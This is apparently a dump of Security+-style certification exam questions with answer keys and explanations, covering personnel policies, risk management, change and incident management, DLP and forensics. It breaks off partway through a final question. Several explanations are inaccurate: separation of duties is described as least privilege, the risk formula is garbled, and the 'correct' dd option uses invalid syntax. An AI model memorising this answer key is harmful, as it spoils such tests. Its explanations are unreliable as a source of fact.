Explanation: Least privilege (privilege reviews) and job rotation are done when mandatory vacations are implemented. This will uncover areas where the system administrators neglected to check all users' privileges, since the other users must fill in their positions while they are on their mandatory vacation.

A company that has a mandatory vacation policy has implemented which of the following controls?


A. Risk control


B. Privacy control


C. Technical control


D. Physical control

Answer: A
Explanation: Risk mitigation is done any time you take steps to reduce risks. Thus implementing mandatory vacations is a risk control measure, because it is a step taken as risk mitigation.

Which of the following should Joe, a security manager, implement to reduce the risk of employees working in collusion to embezzle funds from his company?


A. Privacy Policy


B. Least Privilege


C. Acceptable Use


D. Mandatory Vacations

Answer: D
Explanation: When one person fills in for another, such as for mandatory vacations, it provides an opportunity to see what the person is doing and potentially uncover any fraud.

A company is looking to reduce the likelihood of employees in the finance department being involved with money laundering. Which of the following controls would BEST mitigate this risk?


A. Implement privacy policies


B. Enforce mandatory vacations


C. Implement a security policy


D. Enforce time of day restrictions

Answer: B
Explanation: A mandatory vacation policy requires all users to take time away from work to refresh. At the same time, it gives the company a chance to make sure that others can fill in any gaps in skills and satisfies the need to have replication or duplication at all levels. It also affords the company an opportunity to discover fraud: when others do the same job in the absence of the regular staff member, there is transparency.

The Chief Security Officer (CSO) is concerned about misuse of company assets and wishes to determine who may be responsible. Which of the following would be the BEST course of action?


A. Create a single, shared user account for every system that is audited and logged based upon time of use.


B. Implement a single sign-on application on equipment with sensitive data and high-profile shares.


C. Enact a policy that employees must use their vacation time in a staggered schedule.


D. Separate employees into teams led by a person who acts as a single point of contact for observation purposes.

Answer: C
Explanation: A policy that states employees should use their vacation time in a staggered schedule is a way of employing mandatory vacations. A mandatory vacation policy requires all users to take time away from work while others step in and do the work of the employee on vacation. This will afford the CSO the opportunity to see who is using the company assets responsibly and who is abusing them.

A software developer is responsible for writing the code on an accounting application. Another software developer is responsible for developing code on a system in human resources. Once a year they have to switch roles for several weeks. Which of the following practices is being implemented?




A. Mandatory vacations


B. Job rotation


C. Least privilege


D. Separation of duties

Answer: B
Explanation: A job rotation policy defines intervals at which employees must rotate through positions.

Which of the following types of risk reducing policies also has the added indirect benefit of cross training employees when implemented?


A. Least privilege


B. Job rotation


C. Mandatory vacations


D. Separation of duties

Answer: B
Explanation: A job rotation policy defines intervals at which employees must rotate through positions. Similar in purpose to mandatory vacations, it helps to ensure that the company does not become too dependent on one person, and it affords the company the opportunity to place another person in that same job.

In order to prevent and detect fraud, which of the following should be implemented?


A. Job rotation


B. Risk analysis


C. Incident management


D. Employee evaluations

Answer: A
Explanation: A job rotation policy defines intervals at which employees must rotate through positions. Similar in purpose to mandatory vacations, it helps to ensure that the company does not become too dependent on one person, and it affords the company the opportunity to place another person in that same job; in this way the company can potentially uncover any fraud committed by the incumbent.

The Chief Technical Officer (CTO) has been informed of a potential fraud committed by a database administrator performing several other job functions within the company. Which of the following is the BEST method to prevent such activities in the future?


A. Job rotation


B. Separation of duties


C. Mandatory Vacations


D. Least Privilege

Answer: B
Explanation: Separation of duties means that users are granted only the permissions they need to do their work and no more. More so, it means that you are employing best practices. The segregation of duties and separation of environments is a way to reduce the likelihood of misuse of systems or information. A separation of duties policy is designed to reduce the risk of fraud and to prevent other losses in an organization.

Separation of duties is often implemented between developers and administrators in order to separate which of the following?




A. More experienced employees from less experienced employees


B. Changes to program code and the ability to deploy to production


C. Upper level management users from standard development employees


D. The network access layer from the application access layer

Answer: B
Explanation: Separation of duties means that there is differentiation between users, employees and duties per se, which forms part of best practices.

A user in the company is in charge of various financial roles but needs to prepare for an upcoming audit. They use the same account to access each financial system. Which of the following security controls will MOST likely be implemented within the company?


A. Account lockout policy


B. Account password enforcement


C. Password complexity enabled


D. Separation of duties

Answer: D
Explanation: Separation of duties means that users are granted only the permissions they need to do their work and no more. More so, it means that there is differentiation between users, employees and duties per se, which forms part of best practices.

Everyone in the accounting department has the ability to print and sign checks. Internal audit has asked that only one group of employees may print checks while only two other employees may sign the checks. Which of the following concepts would enforce this process?




A. Separation of Duties


B. Mandatory Vacations


C. Discretionary Access Control


D. Job Rotation

Answer: A
Explanation: Separation of duties means that users are granted only the permissions they need to do their work and no more.

One of the system administrators at a company is assigned to maintain a secure computer lab. The administrator has rights to configure machines, install software, and perform user account maintenance. However, the administrator cannot add new computers to the domain, because that requires authorization from the Information Assurance Officer. This is an example of which of the following?




A. Mandatory access


B. Rule-based access control


C. Least privilege


D. Job rotation

Answer: C
Explanation: A least privilege policy should be used when assigning permissions. Give users only the permissions that they need to do their work and no more.

A security administrator notices that a specific network administrator is making unauthorized changes to the firewall every Saturday morning. Which of the following would be used to mitigate this issue so that only security administrators can make changes to the firewall?




A. Mandatory vacations


B. Job rotation


C. Least privilege


D. Time of day restrictions

Answer: C
Explanation: A least privilege policy is to give users only the permissions that they need to do their work and no more. Practicing the least privilege principle means only security administrators are able to make changes to the firewall.

Which of the following risk mitigation strategies will allow Ann, a security analyst, to enforce least privilege principles?




A. User rights reviews


B. Incident management


C. Risk based controls


D. Annual loss expectancy

Answer: A
Explanation: A least privilege policy should be used when assigning permissions. Give users only the permissions and rights that they need to do their work and no more.

An IT security manager is asked to provide the total risk to the business. Which of the following calculations would the security manager choose to determine total risk?




A. (Threats X vulnerability X asset value) x controls gap


B. (Threats X vulnerability X profit) x asset value


C. Threats X vulnerability X control gap


D. Threats X vulnerability X asset value

Answer: D
Explanation: Threats X vulnerability X asset value is equal to asset value (AV) times exposure factor (EF). This is used to calculate a risk.

A company is preparing to decommission an offline, non-networked root certificate server. Before sending the server's drives to be destroyed by a contracted company, the Chief Security Officer (CSO) wants to be certain that the data will not be accessed. Which of the following, if implemented, would BEST reassure the CSO? (Select TWO).




A. Disk hashing procedures


B. Full disk encryption


C. Data retention policies


D. Disk wiping procedures


E. Removable media encryption

Answer: B,D
Explanation:
B: Full disk encryption is when the entire volume is encrypted; the data is not accessible to someone who might boot another operating system in an attempt to bypass the computer's security. Full disk encryption is sometimes referred to as hard drive encryption.
D: Disk wiping is the process of overwriting the data on the disk repeatedly, or using a magnet to alter the magnetic structure of the disks. This renders the data unreadable.

Identifying residual risk is MOST important to which of the following concepts?


A. Risk deterrence


B. Risk acceptance


C. Risk mitigation


D. Risk avoidance

Answer: B
Explanation: Risk acceptance is often the choice you must make when the cost of implementing any of the other four choices exceeds the value of the harm that would occur if the risk came to fruition. To truly qualify as acceptance, it cannot be a risk where the administrator or manager is unaware of its existence; it has to be an identified risk for which those involved understand the potential cost or damage and agree to accept it. Residual risk is always present and will remain a risk, thus it should be accepted (risk acceptance).

A software company has completed a security assessment. The assessment states that the company should implement fencing and lighting around the property. Additionally, the assessment states that production releases of their software should be digitally signed. Given the recommendations, the company was deficient in which of the following core security areas? (Select TWO).




A. Fault tolerance


B. Encryption


C. Availability


D. Integrity


E. Safety


F. Confidentiality

Answer: D,E
Explanation: Aspects such as fencing, proper lighting, locks, CCTV, escape plans, drills, escape routes and testing controls form part of safety controls.
Integrity refers to aspects such as hashing, digital signatures, certificates and non-repudiation, all of which have to do with data integrity.

Which of the following defines a business goal for system restoration and acceptable data loss?


A. MTTR


B. MTBF


C. RPO


D. Warm site

Answer: C
Explanation: The recovery point objective (RPO) defines the point at which the system needs to be restored. This could be where the system was two days before it crashed (whip out the old backup tapes) or five minutes before it crashed (requiring complete redundancy). This is an essential business goal insofar as system restoration and acceptable data loss is concerned.

Sara, the Chief Security Officer (CSO), has had four security breaches during the past two years. Each breach has cost the company $3,000. A third party vendor has offered to repair the security hole in the system for $25,000. The breached system is scheduled to be replaced in five years. Which of the following should Sara do to address the risk?




A. Accept the risk saving $10,000.


B. Ignore the risk saving $5,000.


C. Mitigate the risk saving $10,000.


D. Transfer the risk saving $5,000.

Answer: D
Explanation: Risk transference involves sharing some of the risk burden with someone else, such as an insurance company. The cost of the security breach over a period of 5 years would amount to $30,000 and it is better to save $5,000.

Which of the following concepts are included on the three sides of the "security triangle"? (Select THREE).


A. Confidentiality


B. Availability


C. Integrity


D. Authorization


E. Authentication


F. Continuity

Answer: A,B,C
Explanation: Confidentiality, integrity, and availability are the three most important concepts in security. Thus they form the security triangle.

Elastic cloud computing environments often reuse the same physical hardware for multiple customers over time as virtual machines are instantiated and deleted. This has important implications for which of the following data security concerns?




A. Hardware integrity


B. Data confidentiality


C. Availability of servers


D. Integrity of data

Answer: B
Explanation: Data that is not kept separate or segregated may have its confidentiality compromised. Be aware of the fact that your data is only as safe as the data with which it is integrated. For example, assume that your client database is hosted on a server that another company is also using to test an application that they are creating. If their application obtains root level access at some point (such as to change passwords) and crashes at that point, then the user running the application could be left with root permissions and conceivably be able to access data on the server for which they are not authorized, such as your client database. Data segregation is crucial; keep your data on secure servers.

The system administrator notices that their application is no longer able to keep up with the large amounts of traffic their server is receiving daily. Several packets are dropped and sometimes the server is taken offline. Which of the following would be a possible solution to look into to ensure their application remains secure and available?




A. Cloud computing


B. Full disk encryption


C. Data Loss Prevention


D. HSM

Answer: A
Explanation: Cloud computing means hosting services and data on the Internet instead of hosting it locally. There is thus no issue when the company's server is taken offline.

Users can authenticate to a company's web applications using their credentials from a popular social media site. Which of the following poses the greatest risk with this integration?




A. Malicious users can exploit local corporate credentials with their social media credentials


B. Changes to passwords on the social media site can be delayed from replicating to the company


C. Data loss from the corporate servers can create legal liabilities with the social media site


D. Password breaches to the social media site affect the company application as well

Answer: D


Explanation: Social networking and having your company's application authentication "linked" to the credentials that users use on social media sites exposes your company's application exponentially more than is necessary. You should strive to practice risk avoidance.

Which of the following is the GREATEST security risk of two or more companies working together under a Memorandum of Understanding?




A. Budgetary considerations may not have been written into the MOU, leaving an entity to absorb more cost than intended at signing.


B. MOUs have strict policies in place for services performed between the entities and the penalties for compromising a partner are high.


C. MOUs are generally loose agreements and therefore may not have strict guidelines in place to protect sensitive data between the two entities.


D. MOUs between two companies working together cannot be held to the same legal standards as SLAs.

Answer: C
Explanation: The Memorandum of Understanding (MOU) is a document used in many settings in the information industry. It is a brief summary of which party is responsible for what portion of the work. For example, Company A may be responsible for maintaining the database server and Company B may be responsible for telecommunications. MOUs are not legally binding, but they carry a degree of seriousness and mutual respect, stronger than a gentlemen's agreement. Often, MOUs are the first steps towards a legal contract.

Which of the following describes the purpose of an MOU?


A. Define interoperability requirements


B. Define data backup process


C. Define onboard/offboard procedure


D. Define responsibilities of each party

Answer: D
Explanation: An MOU, or Memorandum of Understanding, is a document outlining which party is responsible for what portion of the work.

A company has decided to move large data sets to a cloud provider in order to limit the costs of new infrastructure. Some of the data is sensitive and the Chief Information Officer wants to make sure both parties have a clear understanding of the controls needed to protect the data. Which of the following types of interoperability agreement is this?


A. ISA


B. MOU


C. SLA


D. BPA

Answer: A
Explanation: An ISA (Interconnection Security Agreement) is an agreement between two organizations that have connected systems. The agreement documents the technical requirements of the connected systems.

Which of the following is the primary security concern when deploying a mobile device on a network?


A. Strong authentication


B. Interoperability


C. Data security


D. Cloud storage technique

Answer: C
Explanation: Mobile devices, such as laptops, tablet computers, and smartphones, provide security challenges above those of desktop workstations, servers, and such, in that they leave the office. This increases the odds of their theft, which makes data security a real concern. At a bare minimum, the following security measures should be in place on mobile devices: screen lock, strong password, device encryption, remote wipe or sanitation, voice encryption, GPS tracking, application control, storage segmentation, asset tracking and device access control.

A security administrator plans on replacing a critical business application in five years. Recently, there was a security flaw discovered in the application that will cause the IT department to manually re-enable user accounts each month at a cost of $2,000. Patching the application today would cost $140,000 and take two months to implement. Which of the following should the security administrator do in regards to the application?


A. Avoid the risk to the user base allowing them to re-enable their own accounts


B. Mitigate the risk by patching the application to increase security and saving money


C. Transfer the risk replacing the application now instead of in five years


D. Accept the risk and continue to enable the accounts each month saving money

Answer: D
Explanation: This is a risk acceptance measure that has to be implemented, since the cost of patching would be too high compared to the cost to keep the system going as is. Risk acceptance is often the choice you must make when the cost of implementing any of the other four choices (i.e. risk deterrence, mitigation, transference or avoidance) exceeds the value of the harm that would occur if the risk came to fruition.

Acme Corp has selectively outsourced proprietary business processes to ABC Services. Due to some technical issues, ABC Services wants to send some of Acme Corp's debug data to a third party vendor for problem resolution. Which of the following MUST be considered prior to sending data to a third party?


A. The data should be encrypted prior to transport


B. This would not constitute unauthorized data sharing


C. This may violate data ownership and non-disclosure agreements


D. Acme Corp should send the data to ABC Services' vendor instead

Answer: CExplanation: With sending your data to a third party is already a risk since the third party may have a differentpolicy than yours. Data ownership and non-disclosure is already a risk that you will have to acceptsince the data will be sent for debugging /troubleshooting purposes which will result in definite disclosure of the data

An administrator wants to minimize the amount of time needed to perform backups during the week. It is also acceptable to the administrator for restoration to take an extended time frame. Which of the following strategies would the administrator MOST likely implement?

A. Full backups on the weekend and incremental during the week
B. Full backups on the weekend and full backups every day
C. Incremental backups on the weekend and differential backups every day
D. Differential backups on the weekend and full backups every day

Answer: A
Explanation: A full backup is a complete, comprehensive backup of all files on a disk or server. The full backup is current only at the time it's performed. Once a full backup is made, you have a complete archive of the system at that point in time. A system shouldn't be in use while it undergoes a full backup because some files may not get backed up. Once the system goes back into operation, the backup is no longer current. A full backup can be a time-consuming process on a large system.
An incremental backup is a partial backup that stores only the information that has been changed since the last full or the last incremental backup. If a full backup were performed on a Sunday night, an incremental backup done on Monday night would contain only the information that changed since Sunday night. Such a backup is typically considerably smaller than a full backup. Each incremental backup must be retained until a full backup can be performed. Incremental backups are usually the fastest backups to perform on most systems, and each incremental backup tape is relatively small.

A security administrator needs to update the OS on all the switches in the company. Which of the following MUST be done before any actual switch configuration is performed?

A. The request needs to be sent to the incident management team.
B. The request needs to be approved through the incident management process.
C. The request needs to be approved through the change management process.
D. The request needs to be sent to the change management team.

Answer: C
Explanation: Change management is a risk mitigation approach and refers to the structured approach that is followed to secure a company's assets. Thus the actual switch configuration should first be subject to change management approval.

Developers currently have access to update production servers without going through an approval process. Which of the following strategies would BEST mitigate this risk?

A. Incident management
B. Clean desk policy
C. Routine audits
D. Change management

Answer: D
Explanation: Change management is a risk mitigation approach and refers to the structured approach that is followed to secure a company's assets. This structured approach involves policies that should be in place and technological controls that should be enforced.

Which of the following mitigation strategies is established to reduce risk when performing updates to business critical systems?

A. Incident management
B. Server clustering
C. Change management
D. Forensic analysis

Answer: C
Explanation: Change management is a risk mitigation approach and refers to the structured approach that is followed to secure a company's assets; in this case, 'performing updates to business critical systems'.

The network administrator is responsible for promoting code to applications on a DMZ web server. Which of the following processes is being followed to ensure application integrity?

A. Application hardening
B. Application firewall review
C. Application change management
D. Application patch management

Answer: C
Explanation: Change management is the structured approach that is followed to secure a company's assets. Promoting code to applications on a DMZ web server would fall under change management.

Which of the following MOST specifically defines the procedures to follow when scheduled system patching fails, resulting in system outages?

A. Risk transference
B. Change management
C. Configuration management
D. Access control revalidation

Answer: B
Explanation: Change management is a risk mitigation approach and refers to the structured approach that is followed to secure a company's assets; in this case, 'scheduled system patching'.

A security engineer is given new application extensions each month that need to be secured prior to implementation. They do not want the new extensions to invalidate or interfere with existing application security. Additionally, the engineer wants to ensure that the new requirements are approved by the appropriate personnel. Which of the following should be in place to meet these two goals? (Select TWO).

A. Patch Audit Policy
B. Change Control Policy
C. Incident Management Policy
D. Regression Testing Policy
E. Escalation Policy
F. Application Audit Policy

Answer: B,D
Explanation: A backout (regression testing) is a reversion from a change that had negative consequences. It could be, for example, that everything was working fine until you installed a service pack on a production machine, and then services that were normally available were no longer accessible. The backout, in this instance, would revert the system to the state that it was in before the service pack was applied. Backout plans can include uninstalling service packs, hotfixes, and patches, but they can also include reversing a migration and using previous firmware. A key component to creating such a plan is identifying what events will trigger your implementing the backout.
A change control policy refers to the structured approach that is followed to secure a company's assets in the event of changes occurring.

A user has received an email from an external source which asks for details on the company's new product line set for release in one month. The user has a detailed spec sheet, but it is marked "Internal Proprietary Information". Which of the following should the user do NEXT?

A. Contact their manager and request guidance on how to best move forward
B. Contact the help desk and/or incident response team to determine next steps
C. Provide the requestor with the email information since it will be released soon anyway
D. Reply back to the requestor to gain their contact information and call them

Answer: B
Explanation: This is an incident that has to be responded to by the person who discovered it, in this case the user. An incident is any attempt to violate a security policy, a successful penetration, a compromise of a system, or any unauthorized access to information. It's important that an incident response policy establish at least the following items:
Outside agencies that should be contacted or notified in case of an incident
Resources used to deal with an incident
Procedures to gather and secure evidence
List of information that should be collected about an incident
Outside experts who can be used to address issues if needed
Policies and guidelines regarding how to handle an incident
Since the spec sheet has been marked Internal Proprietary Information, the user should refer the incident to the incident response team.

Which of the following is BEST carried out immediately after a security breach is discovered?

A. Risk transference
B. Access control revalidation
C. Change management
D. Incident management

Answer: D
Explanation: Incident management is the set of steps followed when a security incident occurs.

A security analyst informs the Chief Executive Officer (CEO) that a security breach has just occurred. This results in the Risk Manager and Chief Information Officer (CIO) being caught unaware when the CEO asks for further information. Which of the following strategies should be implemented to ensure the Risk Manager and CIO are not caught unaware in the future?

A. Procedure and policy management
B. Chain of custody management
C. Change management
D. Incident management

Answer: D
Explanation: Incident management refers to the steps followed when events occur (making sure controls are in place to prevent unauthorized access to, and changes of, all IT assets). The events that could occur include security breaches.

Requiring technicians to report spyware infections is a step in which of the following?

A. Routine audits
B. Change management
C. Incident management
D. Clean desk policy

Answer: C
Explanation: Incident management refers to the steps followed when events occur (making sure controls are in place to prevent unauthorized access to, and changes of, all IT assets).

Which of the following is the BEST approach to perform risk mitigation of user access control rights?

A. Conduct surveys and rank the results.
B. Perform routine user permission reviews.
C. Implement periodic vulnerability scanning.
D. Disable user accounts that have not been used within the last two weeks.

Answer: B
Explanation: Risk mitigation is accomplished any time you take steps to reduce risk. This category includes installing antivirus software, educating users about possible threats, monitoring network traffic, adding a firewall, and so on. User permissions may be the most basic aspect of security and are best coupled with the principle of least privilege. Related to permissions is the concept of the access control list (ACL). An ACL is literally a list of who can access what resource and at what level. Thus the best risk mitigation step, insofar as access control rights are concerned, is the regular/routine review of user permissions.

An internal auditor is concerned with privilege creep that is associated with transfers inside the company. Which mitigation measure would detect and correct this?

A. User rights reviews
B. Least privilege and job rotation
C. Change management
D. Change Control

Answer: A
Explanation: A privilege audit is used to determine that all groups, users, and other accounts have the appropriate privileges assigned according to the policies of an organization. This means that a user rights review will reveal whether user accounts have been assigned according to their 'new' job descriptions, or whether there are privilege creep culprits after transfers have occurred.

A security administrator is responsible for performing periodic reviews of user permission settings due to high turnover and internal transfers at a corporation. Which of the following BEST describes the procedure and security rationale for performing such reviews?

A. Review all user permissions and group memberships to ensure only the minimum set of permissions required to perform a job is assigned.
B. Review the permissions of all transferred users to ensure new permissions are granted so the employee can work effectively.
C. Ensure all users have adequate permissions and appropriate group memberships, so the volume of help desk calls is reduced.
D. Ensure former employee accounts have no permissions so that they cannot access any network file stores and resources.

Answer: A
Explanation: Reviewing user permissions and group memberships forms part of a privilege audit, which is used to determine that all groups, users, and other accounts have the appropriate privileges assigned according to the policies of the corporation.

Various network outages have occurred recently due to unapproved changes to network and security devices. All changes were made using various system credentials. The security analyst has been tasked to update the security policy. Which of the following risk mitigation strategies would also need to be implemented to reduce the number of network outages due to unauthorized changes?

A. User rights and permissions review
B. Configuration management
C. Incident management
D. Implement security controls on Layer 3 devices

Answer: A
Explanation: Reviewing user rights and permissions can be used to determine that all groups, users, and other accounts have the appropriate privileges assigned according to the policies of the corporation and their job descriptions. Reviewing user rights and permissions will also afford the security analyst the opportunity to put the principle of least privilege into practice as well as to update the security policy.

After an audit, it was discovered that the security group memberships were not properly adjusted for employees' accounts when they moved from one role to another. Which of the following has the organization failed to properly implement? (Select TWO).

A. Mandatory access control enforcement.
B. User rights and permission reviews.
C. Technical controls over account management.
D. Account termination procedures.
E. Management controls over account management.
F. Incident management and response plan.

Answer: B,E
Explanation: Reviewing user rights and permissions can be used to determine that all groups, users, and other accounts have the appropriate privileges assigned according to the policies of the corporation and their job descriptions, since they were all moved to different roles.
Control over account management would have taken into account the different roles that employees have and adjusted the rights and permissions of these roles accordingly.

The security administrator is currently unaware of an incident that occurred a week ago. Which of the following will ensure the administrator is notified in a timely manner in the future?

A. User permissions reviews
B. Incident response team
C. Change management
D. Routine auditing

Answer: D
Explanation: Routine audits are carried out after you have implemented security controls based on risk. These audits include aspects such as user rights and permissions and specific events.

The system administrator has deployed updated security controls for the network to limit risk of attack. The security manager is concerned that controls continue to function as intended to maintain appropriate security posture. Which of the following risk mitigation strategies is MOST important to the security manager?

A. User permissions
B. Policy enforcement
C. Routine audits
D. Change management

Answer: C
Explanation: After you have implemented security controls based on risk, you must perform routine audits. These audits should include reviews of user rights and permissions as well as specific events. You should pay particular attention to false positives and negatives.

Which of the following security account management techniques should a security analyst implement to prevent staff who have switched company roles from exceeding their privileges?

A. Internal account audits
B. Account disablement
C. Time of day restriction
D. Password complexity

Answer: A
Explanation: Internal account auditing will allow you to move the appropriate users to the proper accounts required after the switching of roles has occurred, and thus check that the principle of least privilege is followed.

Encryption of data at rest is important for sensitive information because of which of the following?

A. Facilitates tier 2 support, by preventing users from changing the OS
B. Renders the recovery of data harder in the event of user password loss
C. Allows the remote removal of data following eDiscovery requests
D. Prevents data from being accessed following theft of physical equipment

Answer: D
Explanation: Data encryption allows data that has been stolen to remain out of the eyes of the intruders who took it, as long as they do not have the proper passwords.

A company is trying to limit the risk associated with the use of unapproved USB devices to copy documents. Which of the following would be the BEST technology control to use in this scenario?

A. Content filtering
B. IDS
C. Audit logs
D. DLP

Answer: D
Explanation: Data loss prevention (DLP) is a strategy for making sure that end users do not send sensitive or critical information outside the corporate network. The term is also used to describe software products that help a network administrator control what data end users can transfer.

Several employees have been printing files that include personally identifiable information of customers. Auditors have raised concerns about the destruction of these hard copies after they are created, and management has decided the best way to address this concern is by preventing these files from being printed. Which of the following would be the BEST control to implement?

A. File encryption
B. Printer hardening
C. Clean desk policies
D. Data loss prevention

Answer: D
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. This would address the concerns of the auditors.

Which of the following security strategies allows a company to limit damage to internal systems and provides loss control?

A. Restoration and recovery strategies
B. Deterrent strategies
C. Containment strategies
D. Detection strategies

Answer: C
Explanation: Containment strategies are used to limit damage and contain a loss so that it may be controlled, much like a quarantine, through incident isolation.

Matt, a security analyst, needs to implement encryption for company data and also prevent theft of company data. Where and how should Matt meet this requirement?

A. Matt should implement access control lists and turn on EFS.
B. Matt should implement DLP and encrypt the company database.
C. Matt should install Truecrypt and encrypt the company server.
D. Matt should install TPMs and encrypt the company database.

Answer: B
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. Encryption is used to protect the data.

An employee recently lost a USB drive containing confidential customer data. Which of the following controls could be utilized to minimize the risk involved with the use of USB drives?

A. DLP
B. Asset tracking
C. HSM
D. Access control

Answer: A
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data.

Which of the following controls would prevent an employee from emailing unencrypted information to their personal email account over the corporate network?

A. DLP
B. CRL
C. TPM
D. HSM

Answer: A
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data.

Which of the following are Data Loss Prevention (DLP) strategies that address data in transit issues? (Select TWO).

A. Scanning printing of documents.
B. Scanning of outbound IM (Instant Messaging).
C. Scanning copying of documents to USB.
D. Scanning of SharePoint document library.
E. Scanning of shared drives.
F. Scanning of HTTP user traffic.

Answer: B,F
Explanation: DLP systems monitor the contents of systems (workstations, servers, networks) to make sure key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. Outbound IM and HTTP user traffic are data over a network, which falls within the data in transit part of a DLP strategy.

Which of the following assets is MOST likely considered for DLP?

A. Application server content
B. USB mass storage devices
C. Reverse proxy
D. Print server

Answer: B
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. A USB mass storage device is the device most likely to be used to steal data because of its small physical size.

The Chief Information Officer (CIO) is concerned with moving an application to a SaaS cloud provider. Which of the following can be implemented to provide for data confidentiality assurance during and after the migration to the cloud?

A. HPM technology
B. Full disk encryption
C. DLP policy
D. TPM technology

Answer: C
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. Software as a Service (SaaS) applications are run remotely over the Web and as such require DLP monitoring.

Which of the following is a Data Loss Prevention (DLP) strategy and is MOST useful for securing data in use?

A. Email scanning
B. Content discovery
C. Database fingerprinting
D. Endpoint protection

Answer: D
Explanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is using the data (looking for unauthorized access) and transmitting the data. DLP systems share commonality with network intrusion prevention systems. Endpoint protection provides security and management over both physical and virtual environments.

A customer service department has a business need to send high volumes of confidential information to customers electronically. All emails go through a DLP scanner. Which of the following is the BEST solution to meet the business needs and protect confidential information?

A. Automatically encrypt impacted outgoing emails
B. Automatically encrypt impacted incoming emails
C. Monitor impacted outgoing emails
D. Prevent impacted outgoing emails

Answer: A
Explanation: Encryption is done to protect the confidentiality and integrity of data. It also provides authentication, nonrepudiation and access control to the data. Since all emails go through a DLP scanner and it is outgoing mail that requires protection, the best option is to put a system in place that will encrypt the outgoing emails automatically.

Which of the following is a best practice when a mistake is made during a forensics examination?

A. The examiner should verify the tools before, during, and after an examination.
B. The examiner should attempt to hide the mistake during cross-examination.
C. The examiner should document the mistake and workaround the problem.
D. The examiner should disclose the mistake and assess another area of the disc.

Answer: C
Explanation: Every step in an incident response should be documented, including every action taken by end users and the incident response team.

An incident response team member needs to perform a forensics examination but does not have the required hardware. Which of the following will allow the team member to perform the examination with minimal impact to the potential evidence?

A. Using a software file recovery disc
B. Mounting the drive in read-only mode
C. Imaging based on order of volatility
D. Hashing the image after capture

Answer: B
Explanation: Mounting the drive in read-only mode will prevent any commands from executing on the drive and altering its contents. This in turn has the least impact on the potential evidence held on the drive in question.

Which of the following should Jane, a security administrator, perform before a hard drive is analyzed with forensics tools?

A. Identify user habits
B. Disconnect system from network
C. Capture system image
D. Interview witnesses

Answer: C
Explanation: Capturing an image of the operating system in its exploited state can be helpful in revisiting the issue after the fact to learn more about it, much in the same way that a virus sample is kept in a laboratory to be studied after an outbreak. You should also act in the order of volatility, which places the system image capture first on the list of a forensic analysis.

Computer evidence at a crime is preserved by making an exact copy of the hard disk. Which of the following does this illustrate?

A. Taking screenshots
B. System image capture
C. Chain of custody
D. Order of volatility

Answer: B
Explanation: A system image would be a snapshot of what exists at the moment. Thus capturing an image of the operating system in its exploited state can be helpful in revisiting the issue after the fact to learn more about it.

To ensure proper evidence collection, which of the following steps should be performed FIRST?

A. Take hashes from the live system
B. Review logs
C. Capture the system image
D. Copy all compromised files

Answer: C
Explanation: Capturing an image of the operating system in its exploited state can be helpful in revisiting the issue after the fact to learn more about it. This is essential since the evidence collection process may result in some mishandling and changing of the exploited state.

A security administrator needs to image a large hard drive for forensic analysis. Which of the following will allow for faster imaging to a second hard drive?

A. cp /dev/sda /dev/sdb bs=8k
B. tail -f /dev/sda > /dev/sdb bs=8k
C. dd in=/dev/sda out=/dev/sdb bs=4k
D. locate /dev/sda /dev/sdb bs=4k

Answer: C
Explanation: dd is a command-line utility for Unix and Unix-like operating systems whose primary purpose is to convert and copy files. dd can duplicate data across files, devices, partitions and volumes.
On Unix, device drivers for hardware (such as hard disks) and special device files (such as /dev/zero and /dev/random) appear in the file system just like normal files; dd can also read and/or write from/to these files, provided that function is implemented in their respective driver. As a result, dd can be used for tasks such as backing up the boot sector of a hard drive and obtaining a fixed amount of random data. The dd program can also perform conversions on the data as it is copied, including byte order swapping and conversion to and from the ASCII and EBCDIC text encodings.
An attempt to copy the entire disk using cp may omit the final block if it is of an unexpected length, whereas dd may succeed. The source and destination disks should have the same size.

A security technician wishes to gather and analyze all Web traffic during a particular time period. Which of the following represents the BEST approach to gathering the required data?

A. Configure a VPN concentrator to log all traffic destined for ports 80 and 443.
B. Configure a proxy server to log all traffic destined for ports 80 and 443.
C. Configure a switch to log all traffic destined for ports 80 and 443.
D. Configure a NIDS to log all traffic destined for ports 80 and 443.

Answer: B
Explanation: A proxy server is in essence a device that acts on behalf of others, and in security terms all internal user interaction with the Internet should be controlled through a proxy server. This makes a proxy server the best tool to gather the required data.

A forensic analyst is reviewing electronic evidence after a robbery. Security cameras installed at the site were facing the wrong direction to capture the incident. The analyst ensures the cameras are turned to face the proper direction. Which of the following types of controls is being used?

A. Detective
B. Deterrent
C. Corrective
D. Preventive

Answer: C
Explanation: A corrective control would be any corrective action taken to fix an existing control that was faulty or wrongly installed; in this case the cameras were already there and just had to be adjusted to perform their function as intended.

Joe, a security administrator, is concerned with users tailgating into the restricted areas. Given a limited budget, which of the following would BEST assist Joe with detecting this activity?

A. Place a full-time guard at the entrance to confirm user identity.
B. Install a camera and DVR at the entrance to monitor access.
C. Revoke all proximity badge access to make users justify access.
D. Install a motion detector near the entrance.

Answer: B
Explanation: Tailgating is a favorite method of gaining entry to electronically locked systems by following someone through the door they just unlocked. With a limited budget, installing a camera and DVR at the entrance to monitor access to the restricted areas is the most feasible solution. The benefit of a camera (also known as closed-circuit television, or CCTV) is that it is always running and can record everything it sees, creating evidence that can be admissible in court if necessary.

The incident response team has received the following email message.

From: monitor@ext-company.com
To: security@company.com
Subject: Copyright infringement

A copyright infringement alert was triggered by IP address 13.10.66.5 at 09:50:01 GMT.

After reviewing the following web logs for IP 13.10.66.5, the team is unable to correlate and identify the incident.

